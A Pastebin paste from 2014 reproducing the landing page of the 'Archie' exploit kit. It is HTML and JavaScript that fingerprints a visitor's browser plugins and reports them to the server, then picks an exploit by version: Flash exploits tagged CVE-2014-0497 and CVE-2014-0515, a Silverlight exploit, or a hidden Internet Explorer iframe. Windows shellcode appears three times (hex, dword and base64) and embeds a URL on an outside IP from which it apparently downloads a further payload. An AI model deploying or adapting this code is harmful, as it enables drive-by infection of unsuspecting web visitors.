API tools faq
paste
Advertisement
physicaldrive0

Archie Exploit Kit

physicaldrive0
Sep 23rd, 2014
977
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.45 KB | None | 0 0
raw download clone embed print report
  1. *** @PhysicalDrive0 ***
  2.  
  3. 2 <html>
  4. 3 <head>
  5. 4 <script type="text/javascript" src="pluginDet.js"></script>
  6. 5 <style type="text/css">
  7. 6 html, body { height: 100%; overflow: auto; }
  8. 7 body { padding: 0; margin: 0; }
  9. 8 #form1 { height: 99%; }
  10. 9 #silverlightControlHost { text-align:center; }
  11. 10 </style>
  12. 11 <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  13. 12 </head>
  14. 13 <body>
  15. 14 </body>
  16. 15 <script>
  17. 16 var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000
  18. 8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3";
  19. 17 var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351
  20. 5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358";
  21. 18
  22. 19 var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA=";
  23. 20
  24. 21 function spanAppend(val)
  25. 22 {
  26. 23 var a = document.createElement("span");
  27. 24 document.body.appendChild(a);
  28. 25 a.innerHTML = val;
  29. 26 }
  30. 27
  31. 28 function flashLow()
  32. 29 {
  33. 30 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu
  34. e="true" /></object>');
  35. 31 }
  36. 32
  37. 33 function flashHigh()
  38. 34 {
  39. 35 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>');
  40. 36 }
  41. 37
  42. 38 function silverHigh()
  43. 39 {
  44. 40 spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p
  45. ayload3+'" /></object></div></form>');
  46. 41 }
  47. 42
  48. 43 function fV(val)
  49. 44 {
  50. 45 return PluginDetect.isMinVersion("Flash", val);
  51. 46 }
  52. 47
  53. 48 function sV(val)
  54. 49 {
  55. 50 return PluginDetect.isMinVersion("Silverlight", val);
  56. 51 }
  57. 52
  58. 53 function ie(turl)
  59. 54 {
  60. 55 w = "frameBorder";
  61. 56 r = "width";
  62. 57 q = "iframe";
  63. 58 s = "height";
  64. 59 z = "createElement";
  65. 60 c = "src";
  66. 61 g = '10';
  67. 62 hh = turl;
  68. 63 ha = document.createElement(q);
  69. 64 ha[w] = '0';
  70. 65 ha[r] = g;
  71. 66 ha[s] = g;
  72. 67 b = ha[c] = hh;
  73. 68 document.body.appendChild(ha);
  74. 69 return;
  75. 70 }
  76. 71
  77. 72 function ieVerOk()
  78. 73 {
  79. 74 t = "test";
  80. 75 try {
  81. 76 j = window.navigator.userAgent.toLowerCase();
  82. 77 x = /MSIE[\/\s]\d+/i [t](j);
  83. 78 m = /Win64;/i [t](j);
  84. 79 z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null;
  85. 80 if (!m && x && z && (z == 6 || z == 5 || z == 4)) {
  86. 81 return true
  87. 82 }
  88. 83 } catch (exc) {}
  89. 84 return false
  90. 85 }
  91. 86
  92. 87 function ieVer() {
  93. 88 t = "test";
  94. 89 try {
  95. 90 if (window.msCrypto)
  96. 91 return 11;
  97. 92 if (window.atob)
  98. 93 return 10;
  99. 94 if (document.addEventListener)
  100. 95 return 9;
  101. 96 if (window.JSON && document.querySelector)
  102. 97 return 8;
  103. 98 if (window.XMLHttpRequest)
  104. 99 return 7;
  105. 100 } catch (exc) { }
  106. 101 return 0
  107. 102 }
  108. 103
  109. 104 function arch() {
  110. 105 try
  111. 106 {
  112. 107 var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
  113. 108 xmlDoc.async = false;
  114. 109 xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
  115. 110 if (xmlDoc.parseError.errorCode == -2147023083)
  116. 111 {
  117. 112 return 64;
  118. 113 }
  119. 114 }
  120. 115 catch (ex)
  121. 116 {
  122. 117 return 0;
  123. 118 }
  124. 119 return 32;
  125. 120 }
  126. 121
  127. 122 var flashVer = PluginDetect.getVersion("Flash");
  128. 123 var Branch = 0;
  129. 124 if (flashVer == "11,0,1,152"
  130. 125 || flashVer == "11,1,102,55" || flashVer == "11,1,102,62"
  131. 126 || flashVer == "11,1,102,63" || flashVer == "11,2,202,228"
  132. 127 || flashVer == "11,2,202,233" || flashVer == "11,2,202,235")
  133. 128 Branch = 1;
  134. 129
  135. 130
  136. 131 if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1))
  137. 132 Branch = 2;
  138. 133 if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1))
  139. 134 Branch = 2;
  140. 135
  141. 136 var silverVer = PluginDetect.getVersion("Silverlight");
  142. 137 var silverBranch = 0;
  143. 138 if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1)
  144. 139 silverBranch = 1;
  145. 140
  146. 141
  147. 142 var adoberVer = PluginDetect.getVersion("AdobeReader");
  148. 143 var adoberBranch = 0;
  149. 144
  150. 145 var archSys = arch();
  151. 146 var ieVersion = 0;
  152. 147 if (archSys != 0)
  153. 148 ieVersion = ieVer();
  154. 149
  155. 150 var sendstr = "";
  156. 151 sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch);
  157. 152 sendstr += encodeURI("&ua=" + window.navigator.userAgent);
  158. 153 sendstr += encodeURI("&ref=" + document.referrer);
  159. 154
  160. 155 if (Branch == 0 && silverBranch == 1)
  161. 156 Branch = 3;
  162. 157 if (Branch == 0 && archSys != 0)
  163. 158 Branch = 4;
  164. 159
  165. 160 try
  166. 161 {
  167. 162 var xmlhttp = new XMLHttpRequest();
  168. 163 xmlhttp.open("POST", "/foo", false);
  169. 164 xmlhttp.send(sendstr);
  170. 165 }
  171. 166 catch (exc){}
  172. 167
  173. 168
  174. 169 switch (Branch)
  175. 170 {
  176. 171 //2014-0497
  177. 172 case 1:
  178. 173 flashLow();
  179. 174 break;
  180. 175
  181. 176 //2014-0515
  182. 177 case 2:
  183. 178 flashHigh();
  184. 179 break;
  185. 180
  186. 181 case 3:
  187. 182 silverHigh();
  188. 183 break;
  189. 184
  190. 185 case 0:
  191. 186 case 4:
  192. 187 //var avar = archSys == 32 ? 0 : 1;
  193. 188 //ie("/phazar.html?a="+avar);
  194. 189
  195. 190 ie("/iebasic.html");
  196. 191 break;
  197. 192 }
  198. 193
  199. 194
  200. 195 </script>
  201. 196 </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!